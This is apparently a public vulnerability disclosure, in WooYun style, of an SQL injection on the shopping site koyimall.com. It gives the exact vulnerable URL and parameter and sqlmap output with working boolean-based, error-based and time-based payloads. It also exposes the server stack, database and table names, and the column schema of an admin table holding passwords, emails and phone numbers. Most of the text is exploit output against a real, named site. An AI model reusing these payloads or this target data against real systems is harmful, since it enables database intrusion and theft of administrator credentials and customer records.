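2016-04-14: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2016-05-29: The vendor has actively ignored the vulnerability; details are disclosed to the public.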
Test URL: http://www.koyimall.com/?act=shop.goods_view&GS=219967
Test parameter: GS
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: GS
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=shop.goods_view&GS=219768 AND SLEEP(5)
---
web application technology: Nginx, PHP 5.2.5
back-end DBMS: MySQL 5.0
current user is DBA: False

Database: koyimall
Table: durian_buy
[851 entries]

Database: koyimall
Table: durian_admin
[14 columns]
+-----------------------+--------------+
| Column                | Type         |
+-----------------------+--------------+
| admin_email           | varchar(70)  |
| admin_id              | varchar(20)  |
| admin_is_priv_officer | tinyint(4)   |
| admin_level           | int(11)      |
| admin_memo            | varchar(200) |
| admin_mobile          | varchar(20)  |
| admin_mod_date        | datetime     |
| admin_name            | varchar(30)  |
| admin_nick            | varchar(100) |
| admin_passwd          | varchar(40)  |
| admin_reg_date        | datetime     |
| admin_status          | tinyint(4)   |
| admin_tel             | varchar(20)  |
| com_seq               | int(11)      |
+-----------------------+--------------+
You know the drill.
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)